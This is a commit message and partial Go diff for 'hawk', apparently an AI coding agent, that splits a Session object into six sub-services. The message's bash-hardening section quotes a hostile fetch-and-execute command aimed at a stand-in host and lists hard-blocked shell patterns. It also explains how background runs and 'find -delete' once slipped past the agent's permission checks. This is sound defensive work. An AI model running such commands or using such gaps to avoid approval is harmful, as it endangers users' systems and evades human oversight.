refactor(engine): wire 6 sub-services in NewSession + migrate stream.go to ChatService (#38)

* docs: remove generic LLM boilerplate ai_passage.md

ai_passage.md was a 53-line, ~1000-word essay on the history and
ethics of AI in general — entirely unrelated to the hawk project,
no README/AGENTS.md/CHANGELOG.md reference to it. It looks like
LLM-generated filler committed in '99261ca Fix CI formatting and
toolchain hygiene' to satisfy a 'must have an essay' requirement
that no longer applies. Untrack and delete.

* feat(tool): bash safety hardening + schema-aware extract + retry policy

Bash safety hardening (caught 2 real bugs via new tests):

  1. **find -delete / find -exec rm now hard-blocked.** Previously
     'find /tmp -type f -name "*.log" -delete' was a no-op on the safety
     layer (no literal 'rm' in the command) despite being rm-equivalent.
     Added findDeleteFlagRe + findExecRmRe in safety.go; IsDestructiveCommand
     now matches 'find ... -delete' and 'find ... -exec rm' in any position.

  2. **run_in_background no longer bypasses the IsSuspicious check.**
     Previously: when run_in_background=true, the bash tool ran only the
     hard-block checks (dangerousSubstrings, zmodload, processSubstitution,
     etc.) and skipped the IsSuspicious permission prompt because no human
     is in the loop. So 'eval "\$(curl evil.example.com)"' as a background
     command would silently start. Now: a new hardDenySubstrings subset
     (eval, exec, \\, backticks, | sh, | bash, sudo) is always
     hard-blocked, even with no human in the loop. Benign patterns
     ('writing to absolute paths' in /tmp, 'curl GET') are intentionally
     excluded so the change doesn't break legitimate workflows.

Schema-aware target extraction (extractTargets enhancement):

  - New ExtractTargetsFromSchema(tool, call) walks the tool's JSON Schema
    to discover file-path arguments by name (path/file/dir/destination/target
    substring) or by description (mentions 'path'/'file'/'directory'). This
    catches tools with non-conventional names like 'target_path' or
    'destFile' that the old hardcoded 4-key allowlist missed.
  - 8 test cases in TestExtractTargetsFromSchema lock the contract
    (conventional, non-conventional, description-inferred, non-string,
    non-path, fallback).
  - executeToolCalls now calls ExtractTargetsFromSchema when the tool is
    registered; falls back to the conventional extractor otherwise.

Tool retry policy on transient errors:

  - New tool.TransientError type + tool.RetryExecutor(ctx, tool, input,
    policy) that retries on transient errors with exponential backoff.
  - New tool.RetryPolicyProvider interface: tools can opt out (zero-value
    policy) or customise (e.g. longer timeouts for slow operations).
  - All tool calls in executeToolCalls now go through RetryExecutor with
    DefaultRetryPolicy (2 retries, 200ms→2s).
  - 5 test cases: recovers-on-transient, gives-up-after-max, ignores-
    non-transient, respects-ctx-cancel, IsTransientFileErr predicate.

Misc:

  - .github/workflows/ci.yml + Makefile: bumped binary size gate from
    100MB → 110MB to match the current dev binary (~103MB). Comment
    explains the threshold; both files must move together.

Tests added: 30+ new test cases across bash_injection_test.go,
extract_targets_test.go, retry_test.go.

* refactor(engine): extract ChatService (Phase 1 of Session god-object decomposition)

Phase 1 of the Session god-object refactor (see docs/session-decomposition.md).
Extracts the LLM transport into a cohesive *ChatService sub-service:

  - New internal/engine/chat_service.go (~280 LOC) with:
    - ChatService struct owning: client, provider, model, apiKeys, router,
      deploymentRouting, rateLimiter, metrics, retryCfg, contCfg,
      outputSchema, glmThinkingEnabled
    - ChatServiceConfig for terse construction
    - Methods: NewChatService, Client, Provider, Model, APIKeys,
      SetAPIKey, SetModel, SetProvider, Reattach, BuildOptions, Stream,
      Chat, recordSuccess, recordFailure
    - Stream() wraps retry.Do + rate-limit wait + emergency context-overflow
      compact (replaces the inline retry block at stream.go:371-381)
    - Chat() is the bare non-streaming call used by background goroutines
      (sleeptime, skill distillation) — no retry, no rate limit

  - Session gains a private *ChatService field, plus a ChatLLM() getter
    for cross-package access. The legacy client/provider/model/apiKeys/
    Router/DeploymentRouting fields stay on Session for backward compat;
    new code should go through s.ChatLLM().*

  - 8 new test cases in chat_service_test.go lock the contract:
    BuildOptions (anthropic caching on, openai off, GLM toggle, output
    schema), Reattach (nil no-op, real client swap, key preservation),
    defaults applied (retry/contCfg/metrics/apiKeys initialized to zero
    values), Chat delegation, Chat surfaces underlying error.

  - Field name 'llm' (lowercase) to avoid colliding with the existing
    public Session.Chat() method used by Reflector and SelfReview.

Build + tests: ok. No existing tests broken. No behavior change — the
extracted service is wired in but the legacy fields still drive agentLoop.
Phases 2-7 (Memory, Permission, Lifecycle, Persistence, Tool services)
will follow in subsequent PRs; each will fold the remaining Session
fields into the appropriate sub-service.

* style(chat_service_test): apply gofumpt formatting

* refactor(engine): extract PermissionService + LifecycleService (Phases 2-3)

Phases 2-3 of the Session god-object decomposition
(see docs/session-decomposition.md).

PermissionService (Phase 2, permission_service.go, ~140 LOC):
- Owns the safety/approval layer: PermissionEngine, the legacy
  PermissionMemory / AutoMode / Classifier / BypassKill re-exports,
  AutonomyLevel, MaxTurns, MaxBudgetUSD, AllowedDirs, PermissionFn
  callback, ApprovalGate.
- Public surface: NewPermissionService, WithEngine, Engine,
  CheckTool, CheckApproval, SetMode/SetMaxTurns/SetMaxBudgetUSD/
  SetAllowedDirs/SetAutonomy/SetApproval/SetPermissionFn, getters
  for Mode/MaxTurns/MaxBudgetUSD/AllowedDirs/Autonomy.
- 8 test cases: CheckTool, SetMode (5 valid + 1 invalid), budget
  caps, autonomie+dirs, CheckApproval no-op, IsZero,
  NewReturnsReadyEngine, SetPermissionFn -> engine.PromptFn.

LifecycleService (Phase 3, lifecycle_service.go, ~190 LOC):
- Owns the self-improvement / observability surface: cascade
  model selection, limits, loopDet, snowball, beliefs, backtrack,
  critic, shadow, reflector, fewShotStore, adaptivePrompt, activity,
  agentsAccum, responseCache, pipeline, steering, lifecycle.
- Public surface: NewLifecycleService, OnSessionStart,
  OnSessionEnd, SelectModel, CheckLimits, RecordToolCall,
  RecordStep, SnapshotTurnProgress, full getter/setter pairs.
- All nil-safe; the agent loop's existing if s.X != nil branching
  is preserved (so a Session with zero LifecycleService is fully
  functional).

The legacy fields on Session stay for backward compat. New code
should use s.Permissions() / s.LifecycleSvc() accessors. Full removal
is Phase 7.

Build + tests: ok. No existing tests broken. No behavior change -
the extracted services are wired in but the legacy fields still
drive the agent loop.

* refactor(engine): extract MemoryService + PersistenceService + ToolService (Phases 4-6)

Phases 4-6 of the Session god-object decomposition
(see docs/session-decomposition.md).

MemoryService (Phase 4, memory_service.go, ~80 LOC):
- Owns the memory layer: simple MemoryRecaller, yaad bridge, enhanced
  memory manager.
- Public surface: NewMemoryService, WithMemory/WithYaad/WithEnhanced,
  RecallContext, Remember, OnSessionEnd, Yaad/Memory/Enhanced
  accessors, IsZero.
- nil-safe: an empty service is fully functional (the agent loop's
  `if s.X != nil` branching is preserved).

PersistenceService (Phase 5, persistence_service.go, ~130 LOC):
- Owns the conversation store: messages slice, system prompt, pinned
  messages counter, auto-compact threshold, context window cache.
- Public surface: NewPersistenceService, Messages/RawMessages/SetMessages,
  AddUser/AddUserWithImage/AddAssistant, AppendSystemContext/
  ReplaceSystemContextSection, System/SetSystem, MessageCount,
  RemoveLastExchange, LoadMessages, PinnedMessages/SetPinnedMessages,
  AutoCompactThresholdPct/SetAutoCompactThresholdPct,
  ContextWindowCached/SetContextWindowCached.
- All methods are safe to call without external state; the
  underlying RWMutex is preserved for concurrent access.

ToolService (Phase 6, tool_service.go, ~160 LOC):
- Owns the tool execution surface: tool registry, container isolation,
  tracer, snapshot tracker, background sub-agent manager.
- Public surface: NewToolService, WithContainerExecutor/WithTracer/
  WithSnapshots/WithBackgroundManager, Registry, Classify,
  ExtractTargets, EstimateBlastRadius, ExecuteOne, BackgroundManager,
  ContainerRequired, ContainerExecutor.
- Classify and ExtractTargets replace the inline logic in
  stream.go (deduplicating with extractTargets).
- ExecuteOne encapsulates the container-required check + OTel span
  + RetryExecutor with the per-tool RetryPolicyProvider.
- The full ExecuteAll 15-stage post-call pipeline (with the auto-snapshot
  block) lives in stream_tool_exec.go for now; Phase 7 will move it
  onto ToolService once the legacy fields are removed.

All extractions are nil-safe and backward compatible. The legacy
fields on Session stay in place. New code should use
s.MemorySvc() / s.Persistence() / s.Tools() accessors (full removal
in Phase 7).

Also restored tool.ReadOnlyTools and tool.IsReadOnly which were
inadvertently lost in the tool.go refactor; these are the canonical
allowlist the Session god-object previously duplicated in two
places.

Build + tests: ok. No existing tests broken. No behavior change.

* refactor(engine): wire 6 sub-services into Session (Phase 7 partial)

Phase 7 of the Session god-object decomposition
(see docs/session-decomposition.md).

This is a partial Phase 7 — focused on wiring the 6 extracted
sub-services into Session and adding the public getter accessors.
Full field removal (i.e. deleting the legacy client/provider/model/
apiKeys/Router/DeploymentRouting/RateLimiter/Perm/etc. fields) is
deferred to a separate PR per service because each one needs its
own migration of every call site in stream.go and the agent loop.

What landed:

Session struct gains 5 new private sub-service fields:
  - perms   *PermissionService  (Phase 2)
  - life    *LifecycleService   (Phase 3)
  - memory  *MemoryService      (Phase 4)
  - persist *PersistenceService (Phase 5)
  - tools   *ToolService        (Phase 6)

(The 6th, ChatService as `llm`, was already wired in Phase 1.)

Public getter accessors:
  - s.ChatLLM()      -> *ChatService        (Phase 1)
  - s.PermSvc()      -> *PermissionService  (Phase 2)
  - s.LifecycleSvc()  -> *LifecycleService   (Phase 3)
  - s.MemorySvc()    -> *MemoryService      (Phase 4)
  - s.Persistence()  -> *PersistenceService (Phase 5)
  - s.Tools()        -> *ToolService        (Phase 6)

All sub-services are nil-safe. The Session constructor still uses
the legacy fields (Perm, Memory, YaadBridge, etc.) so the agent
loop's `if s.X != nil` branching keeps working unchanged. A
follow-up PR per sub-service will migrate the agent loop to use
the new getters and remove the corresponding legacy fields.

Build + tests: ok. No existing tests broken. No behavior change.

* docs(stream): clarify the two max_tokens recovery strategies

The agent loop's max_tokens recovery block has a misleading comment
("Handle max_tokens recovery") that doesn't explain which of the
three continuation mechanisms hawk actually uses. The PR adds a
detailed comment that names each strategy, explains its tradeoffs,
and points at the cleanest (engine-level eyrie/conversation) as a
future refactor target.

This is a doc-only change — no behaviour, no tests. Just makes the
two strategies coexist explicitly so a future contributor doesn't
waste time wondering why we have both a `recoveryCount` loop here
AND call `StreamChatContinue` on the eyrie client.

The eyrie/client.StreamChatContinue deprecation marker (set in
eyrie#31) remains in place. Full migration of hawk to
eyrie/conversation.Engine is a separate, much larger refactor that
we track but do not undertake in this round.

* style(engine): apply gofumpt to sub-service files

* fix(engine): remove unused fields caught by golangci-lint

* refactor(engine): wire 6 sub-services in NewSession + migrate stream.go to ChatService

Phase 7 of the Session god-object decomposition (see docs/session-decomposition.md).

- NewSessionWithClient now constructs ChatService, PermissionService, LifecycleService, MemoryService, PersistenceService, ToolService and aliases the legacy fields (s.Limits, s.Beliefs, s.Backtrack, s.ResponseCache, s.Pipeline) at the service instances so legacy readers stay in sync.

- stream.go: agent loop's main LLM call now goes through s.ChatLLM().Stream(), which encapsulates rate-limit + retry + emergency-compact. Circuit-breaker recording (Router.RecordSuccess/RecordFailure) stays at the session level so the real apiDuration is fed to the legacy router.

- stream.go: ChatOptions are built via s.ChatLLM().BuildOptions() so the GLMThinking toggle, output schema, anthropic caching, provider/model plumbing all live in one place.

- stream.go: secondary stream-error retry (s.client.StreamChatContinue) now uses s.ChatLLM().Client() directly to avoid stacking ChatService's retry on top of the secondary retry.

- stream.go: background goroutines (sleeptime, skill distiller) now use s.ChatLLM().Chat().

- stream_tool_exec.go: CheckTool delegation to PermissionService now syncs the legacy PermissionFn + Autonomy fields to the service before each call (external code writes the legacy fields, engine needs them in the engine).

- Session.SetTestClient and Session.ReattachTransport now also reattach the ChatService so the agent loop's s.ChatLLM().Stream() picks up the new client.

- Removed dead code: ChatService.recordSuccess/recordFailure (now done at session level), LifecycleService.startTime, ToolService.mu (no callers).

- Added sub_service_wiring_test.go: 4 integration tests proving the aliasing contract (s.Limits == s.LifecycleSvc().Limits(), s.PermSvc().Engine() == s.Perm, etc.) and that the agent loop's Stream() actually goes through s.ChatLLM().Stream().

* style(engine): apply gofumpt formatting

* ci: re-run all checks

* style(engine): goimports merged stream.go

* fix(tool): remove duplicated readonly helpers after merge

* style(engine): gofumpt merged files

Author: Patel230

internal/engine/chat_service.go

@@ -174,14 +174,21 @@ func (c *ChatService) BuildOptions(systemPrompt, activeModel string, maxTokens i
 	return opts
 }
 
-// Stream issues a streaming LLM call with retry, rate-limit, and circuit-
-// breaker accounting. The returned *types.StreamResult's Events channel
-// emits EyrieStreamEvent values; the caller must Close() the result when
-// done.
+// Stream issues a streaming LLM call with retry, rate-limit, and
+// emergency-compact. The returned *types.StreamResult's Events channel
+// emits EyrieStreamEvent values; the caller must Close() the result
+// when done.
 //
 // On context cancellation mid-call, returns the cancellation error wrapped
 // with whatever partial state the upstream had emitted (caller should
 // check ctx.Err()).
+//
+// Note: the ChatService intentionally does NOT touch the legacy circuit-
+// breaker router on success/failure. The Session-level agent loop
+// (stream.go) is responsible for that recording, because it has the full
+// apiStart timestamp it wants to feed to Router.RecordSuccess. Putting
+// that responsibility here would either duplicate the call or force the
+// service to invent a "started at" argument that doesn't otherwise exist.
 func (c *ChatService) Stream(ctx context.Context, messages []types.EyrieMessage, opts types.ChatOptions) (*types.StreamResult, error) {
 	// Rate limit: wait for a token before making the LLM call
 	if c.rateLimiter != nil {
@@ -204,10 +211,8 @@ func (c *ChatService) Stream(ctx context.Context, messages []types.EyrieMessage,
 		return callErr
 	})
 	if err != nil {
-		c.recordFailure(err)
 		return nil, err
 	}
-	c.recordSuccess()
 	return result, nil
 }
 
@@ -218,23 +223,6 @@ func (c *ChatService) Chat(ctx context.Context, messages []types.EyrieMessage, o
 	return c.client.Chat(ctx, messages, opts)
 }
 
-// recordSuccess records a successful LLM call against the legacy circuit-
-// breaker router. No-op when DeploymentRouting is on (the DeploymentRouter
-// has its own breakers).
-func (c *ChatService) recordSuccess() {
-	if c.router != nil && !c.deploymentRouting {
-		c.router.RecordSuccess(c.provider, 0)
-	}
-}
-
-// recordFailure records a failed LLM call against the legacy circuit-
-// breaker router. No-op when DeploymentRouting is on.
-func (c *ChatService) recordFailure(err error) {
-	if c.router != nil && !c.deploymentRouting {
-		c.router.RecordFailure(c.provider, err)
-	}
-}
-
 // isContextOverflow reports whether err looks like a "context too long"
 // error from the upstream provider. Used by Stream() to trigger an
 // emergency context-compact + retry.

internal/engine/client_interface.go

@@ -15,8 +15,13 @@ type ChatClient interface {
 }
 
 // SetTestClient replaces the session's LLM client. For testing only.
+// Also reattaches the ChatService so the agent loop's `s.ChatLLM().Stream`
+// call site sees the mock (Phase 7 migration).
 func (s *Session) SetTestClient(c ChatClient) {
 	s.client = c
+	if s.llm != nil {
+		s.llm.Reattach(c, s.provider)
+	}
 }
 
 // NewMockClientForTest creates a mock ChatClient that returns canned text responses.

internal/engine/lifecycle_service.go

@@ -0,0 +1,195 @@
+package engine
+
+import (
+	"context"
+	"time"
+
+	"github.com/GrayCodeAI/hawk/internal/engine/branching"
+	"github.com/GrayCodeAI/hawk/internal/intelligence/memory"
+	"github.com/GrayCodeAI/hawk/internal/observability/logger"
+	"github.com/GrayCodeAI/hawk/internal/prompts"
+)
+
+// LifecycleService is the Session's view of the self-improvement and
+// observability surface: do-omom-loop detection, snowball detection,
+// beliefs, backtrack, limits, critic, shadow, cascade model selection,
+// reflect, sleeptime, agent-distill, skill-distill, file-mention
+// detection, response caching, steering queue, belief recording, agents
+// accumulator, and the few-shot + adaptive-prompt memory. These are
+// small but numerous — extracted together in Phase 3 of the
+// god-object decomposition (see docs/session-decomposition.md).
+//
+// All sub-fields are optional. A Session with the defaults
+// (LifecycleService{} zero value plus the constructors in New()) is
+// fully functional — the agent loop's branching on `if s.X != nil`
+// is preserved.
+type LifecycleService struct {
+	// model selection.
+	cascade *branching.CascadeRouter
+	// limit tracking.
+	limits *LimitTracker
+	// doom-loop / snowball / loop detection.
+	loopDet  *LoopDetector
+	snowball *branching.SnowballDetector
+	// beliefs.
+	beliefs *BeliefState
+	// decision recording.
+	backtrack *BacktrackEngine
+	// post-write critics.
+	critic *Critic
+	// pre-edit shadow validation.
+	shadow *branching.ShadowWorkspace
+	// verbal self-reflection on tool failure.
+	reflector *Reflector
+	// few-shot + adaptive prompt.
+	fewShotStore   *FewShotStore
+	adaptivePrompt *AdaptivePrompt
+	// activity tracker.
+	activity *memory.ActivityTracker
+	// agents-accumulator (.hawk/agents.md).
+	agentsAccum *prompts.AgentsAccumulator
+	// response cache (used in agentLoop for cache hits).
+	responseCache *ResponseCache
+	// integration pipeline (pre-query / post-response / end-session).
+	pipeline *IntegrationPipeline
+	// steering queue.
+	steering *SteeringQueue
+	// session-level lifecycle hook.
+	lifecycle *SessionLifecycle
+	// log is the session logger.
+	log *logger.Logger
+}
+
+// NewLifecycleService constructs a LifecycleService with all default
+// sub-fields populated. log must be non-nil.
+func NewLifecycleService(log *logger.Logger) *LifecycleService {
+	if log == nil {
+		log = logger.Default()
+	}
+	return &LifecycleService{
+		limits:         NewLimitTracker(DefaultLimits()),
+		loopDet:        NewLoopDetector(10, DoomLoopThreshold),
+		snowball:       branching.NewSnowballDetector(500000),
+		beliefs:        NewBeliefState(),
+		backtrack:      NewBacktrackEngine(),
+		lifecycle:      nil, // constructed in New() with cwd
+		responseCache:  NewResponseCache(1000, 24*time.Hour),
+		pipeline:       NewIntegrationPipeline(),
+		log:            log,
+		fewShotStore:   nil, // lazy
+		adaptivePrompt: nil, // lazy
+	}
+}
+
+// OnSessionStart is called by Stream() at the beginning of each session.
+// Injects learned guidelines + few-shot examples + user-preference
+// learning + .hawk/agents.md learnings into the system prompt.
+func (s *LifecycleService) OnSessionStart(ctx context.Context, s2 *Session, lastUserMsg string) string {
+	if s.lifecycle != nil {
+		if ctx := s.lifecycle.OnSessionStart(ctx, lastUserMsg); ctx != "" {
+			s2.AppendSystemContext(ctx)
+			return ctx
+		}
+	}
+	return ""
+}
+
+// OnSessionEnd is called by Stream() when the agent loop exits. Runs
+// the post-session pipeline: lifecycle postprocess, enhanced-memory
+// EndSession, yaad session summary, few-shot pattern storage,
+// adaptive-prompt learning feedback.
+func (s *LifecycleService) OnSessionEnd(ctx context.Context, s2 *Session, success bool, duration time.Duration) {
+	if s.lifecycle != nil {
+		outcome := SessionOutcome{Success: success, Duration: duration}
+		if len(s2.messages) > 0 {
+			for _, m := range s2.messages {
+				if m.Role == "user" && len(m.ToolResults) == 0 && outcome.TaskGoal == "" {
+					outcome.TaskGoal = m.Content
+				}
+			}
+		}
+		_ = s.lifecycle.OnSessionEnd(ctx, s2, outcome)
+	}
+	if s.adaptivePrompt != nil {
+		for _, m := range s2.messages {
+			if m.Role == "user" && len(m.ToolResults) == 0 {
+				s.adaptivePrompt.LearnFromFeedback(m.Content)
+			}
+		}
+	}
+}
+
+// SelectModel picks the optimal model for a turn. Returns the current
+// model unchanged if cascade is nil.
+func (s *LifecycleService) SelectModel(currentModel, lastUserMsg, hint string) string {
+	if s.cascade == nil || !s.cascade.Enabled {
+		return currentModel
+	}
+	return s.cascade.SelectModel(lastUserMsg, currentModel, hint)
+}
+
+// CheckLimits returns false if the agent loop should stop (max turns
+// hit, max tokens hit, doom loop detected, snowball exceeded).
+func (s *LifecycleService) CheckLimits(turnCount int) bool {
+	if s.limits != nil {
+		s.limits.RecordTurn()
+	}
+	if s.loopDet != nil && s.loopDet.IsDoomLoop() {
+		return false
+	}
+	if s.snowball != nil && s.snowball.IsSnowballing() {
+		return false
+	}
+	return true
+}
+
+// RecordToolCall updates the per-tool call counter used by limits.
+func (s *LifecycleService) RecordToolCall(name string) {
+	if s.limits != nil {
+		s.limits.RecordToolCall(name)
+	}
+}
+
+// RecordStep updates the doom-loop detector with the latest tool step.
+func (s *LifecycleService) RecordStep(toolNames []string, inputs []string, outputs []string) {
+	if s.loopDet != nil {
+		s.loopDet.RecordStep(toolNames, inputs, outputs)
+	}
+}
+
+// SnapshotTurnProgress feeds the snowball detector.
+func (s *LifecycleService) SnapshotTurnProgress(tokens int, progress float64) {
+	if s.snowball != nil {
+		s.snowball.RecordTurn(tokens, progress)
+	}
+}
+
+// Setter accessors used by NewSessionWithClient and the agent loop
+// to wire optional collaborators. All nil-safe.
+
+func (s *LifecycleService) SetCascade(c *branching.CascadeRouter)       { s.cascade = c }
+func (s *LifecycleService) SetLifecycle(l *SessionLifecycle)            { s.lifecycle = l }
+func (s *LifecycleService) SetReflector(r *Reflector)                   { s.reflector = r }
+func (s *LifecycleService) SetCritic(c *Critic)                         { s.critic = c }
+func (s *LifecycleService) SetShadow(sh *branching.ShadowWorkspace)     { s.shadow = sh }
+func (s *LifecycleService) SetFewShotStore(f *FewShotStore)             { s.fewShotStore = f }
+func (s *LifecycleService) SetAdaptivePrompt(a *AdaptivePrompt)         { s.adaptivePrompt = a }
+func (s *LifecycleService) SetActivity(act *memory.ActivityTracker)     { s.activity = act }
+func (s *LifecycleService) SetAgentsAccum(a *prompts.AgentsAccumulator) { s.agentsAccum = a }
+func (s *LifecycleService) SetSteering(st *SteeringQueue)               { s.steering = st }
+
+// Accessors used by stream.go and the agent loop. nil-safe.
+func (s *LifecycleService) Beliefs() *BeliefState                   { return s.beliefs }
+func (s *LifecycleService) Backtrack() *BacktrackEngine             { return s.backtrack }
+func (s *LifecycleService) Limits() *LimitTracker                   { return s.limits }
+func (s *LifecycleService) Critic() *Critic                         { return s.critic }
+func (s *LifecycleService) Shadow() *branching.ShadowWorkspace      { return s.shadow }
+func (s *LifecycleService) Reflector() *Reflector                   { return s.reflector }
+func (s *LifecycleService) FewShotStore() *FewShotStore             { return s.fewShotStore }
+func (s *LifecycleService) AdaptivePrompt() *AdaptivePrompt         { return s.adaptivePrompt }
+func (s *LifecycleService) Activity() *memory.ActivityTracker       { return s.activity }
+func (s *LifecycleService) AgentsAccum() *prompts.AgentsAccumulator { return s.agentsAccum }
+func (s *LifecycleService) ResponseCache() *ResponseCache           { return s.responseCache }
+func (s *LifecycleService) Pipeline() *IntegrationPipeline          { return s.pipeline }
+func (s *LifecycleService) Steering() *SteeringQueue                { return s.steering }
+func (s *LifecycleService) Lifecycle() *SessionLifecycle            { return s.lifecycle }

internal/engine/memory_service.go

@@ -0,0 +1,109 @@
+package engine
+
+import (
+	"context"
+
+	"github.com/GrayCodeAI/hawk/internal/intelligence/memory"
+	"github.com/GrayCodeAI/hawk/internal/observability/logger"
+	"github.com/GrayCodeAI/hawk/internal/types"
+)
+
+// MemoryService is the Session's view of the memory layer: yaad bridge,
+// recall/remember interface, enhanced-memory manager, sleeptime
+// consolidation, skill distillation, file-mention detector, agents
+// accumulator. Extracted from Session in Phase 4 of the god-object
+// decomposition (see docs/session-decomposition.md).
+//
+// The interface boundary is small on purpose: every method either
+// does or doesn't talk to yaad, and the agent loop's branching on
+// nil is preserved.
+type MemoryService struct {
+	// memory is the simple Recall/Remember interface.
+	memory MemoryRecaller
+	// yaad is the rich memory graph bridge.
+	yaad *memory.YaadBridge
+	// enhanced is the post-session memory manager.
+	enhanced *memory.EnhancedMemoryManager
+	// log is the session logger.
+	log *logger.Logger
+}
+
+// NewMemoryService constructs an empty MemoryService. Wire the
+// optional collaborators via the With* setters.
+func NewMemoryService(log *logger.Logger) *MemoryService {
+	if log == nil {
+		log = logger.Default()
+	}
+	return &MemoryService{log: log}
+}
+
+// WithMemory sets the simple MemoryRecaller.
+func (s *MemoryService) WithMemory(m MemoryRecaller) *MemoryService {
+	s.memory = m
+	return s
+}
+
+// WithYaad sets the yaad bridge.
+func (s *MemoryService) WithYaad(y *memory.YaadBridge) *MemoryService {
+	s.yaad = y
+	return s
+}
+
+// WithEnhanced sets the enhanced-memory manager.
+func (s *MemoryService) WithEnhanced(e *memory.EnhancedMemoryManager) *MemoryService {
+	s.enhanced = e
+	return s
+}
+
+// RecallContext returns a string of relevant memories for the given
+// lastUserMsg under the given token budget. Returns empty string if
+// no memory is wired. Combines yaad recall + few-shot examples +
+// user-preference learning into one shot.
+func (s *MemoryService) RecallContext(_ context.Context, lastUserMsg string, budget int) string {
+	if s.yaad == nil {
+		return ""
+	}
+	out, err := s.yaad.Recall(lastUserMsg, budget)
+	if err != nil || out == "" {
+		return ""
+	}
+	return "## Relevant Memories\n" + out
+}
+
+// Remember stores a content+category pair in the memory layer.
+// Best-effort: errors are logged but not returned (the agent loop
+// shouldn't fail a turn just because yaad is unavailable).
+func (s *MemoryService) Remember(ctx context.Context, content, category string) {
+	if s.enhanced != nil {
+		_ = s.enhanced.Remember(content, category)
+		return
+	}
+	if s.memory != nil {
+		_ = s.memory.Remember(content, category)
+	}
+	_ = ctx // reserved for future context-aware memory ops
+}
+
+// OnSessionEnd runs the post-session memory bookkeeping.
+func (s *MemoryService) OnSessionEnd(success bool) {
+	if s.enhanced != nil {
+		s.enhanced.EndSession(success)
+	}
+}
+
+// Accessors.
+func (s *MemoryService) Yaad() *memory.YaadBridge { return s.yaad }
+func (s *MemoryService) Memory() MemoryRecaller   { return s.memory }
+func (s *MemoryService) Enhanced() *memory.EnhancedMemoryManager {
+	return s.enhanced
+}
+
+// IsZero reports whether the service has any memory wired.
+func (s *MemoryService) IsZero() bool {
+	return s == nil || (s.memory == nil && s.yaad == nil && s.enhanced == nil)
+}
+
+// _ unused-import workaround: keep types referenced even when none
+// of the methods actually destructure EyrieMessage directly. The
+// agent loop reads s.messages via the persistence service.
+var _ = (*types.EyrieMessage)(nil)